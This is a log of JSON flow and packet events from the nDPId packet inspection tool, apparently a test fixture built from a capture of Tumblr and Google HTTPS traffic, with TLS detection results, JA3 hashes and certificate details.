-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14201,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+M+Z1rOqVQHwgBALQGcqAAABAQgKwt3K8aG8sBU="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14202,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBNmN7X0wHcAwfgBALjg4+AAABAQgKwt3K8thacg8="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14203,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvk+vuVlIuY4OlPgBALOKdvAAABAQgKwt3K8qG8sBY="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14204,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605292116783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292116783,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhvNVWQYa3RpcegBALd4k3AAABAQgKwt3K8rgmZ+0="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118602,"flow_last_seen":1605292118602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d582","src_port":50906,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23343,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605292118602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118602,"pkt":"qtsDr8lk5EKm5WPyht1gAi73ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtWCxtoBu1KGqo810Lv\/gBAB9aO7AAABAQgKDow6U8LdGxc="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292118714,"flow_last_seen":1605292118714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292118714,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23344,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605292118714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118714,"pkt":"qtsDr8lk5EKm5WPyht1gADFFACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv1wBu54AWFX+ZWnrgBAB9ax4AAABAQgKIY6128LdIt0="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23345,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605292118777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118777,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAANg61YIqAcsBIEmLB5kd7IUo3\/YpAbvG2jXQu\/9ShqqQgBAMVq52AAABAQgKwt3S6w6JbWQ="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23346,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292118786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/XP5laeueAFhWgBALgb+AAAABAQgKwt3S8iGL6TM="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292119370,"flow_last_seen":1605292119370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292119370,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200e","src_port":57770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605292119370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119370,"pkt":"qtsDr8lk5EKm5WPyht1gB9dmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4aoBuwkMYXdt3wkTgBAGDPrTAAABAQgKuCcls8LdJNk="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23348,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605292119458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119458,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhqm3fCRMJDGF4gBAMQfSOAAABAQgKwt3Va7gmdTA="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gBWy\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAO4pQBuzf4sNBRRFrJgBAB9RDeAAABAQgKzK1LLsLdJJ0="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gD6CDACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1uYBu2Ue7VYDxGJbgBAB9U4jAAABAQgKcJlSucLdI9M="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gCJJIACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv2oBu3NXQRgXN+V5gBAZpzN2AAABAQgKIY69b8LdKhI="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23359,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605292120839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120839,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgIAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvilFFEWsk3+LDRgBALmwajAAABAQgKwt3a98yslWg="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23360,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvW5gPEYltlHu1XgBALmkPeAAABAQgKwt3bBnCYnCU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23362,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/ahc35XlzV0EZgBAPBj1lAAABAQgKwt3bBiGODSw="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121486,"flow_last_seen":1605292121486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292121486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} -00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} 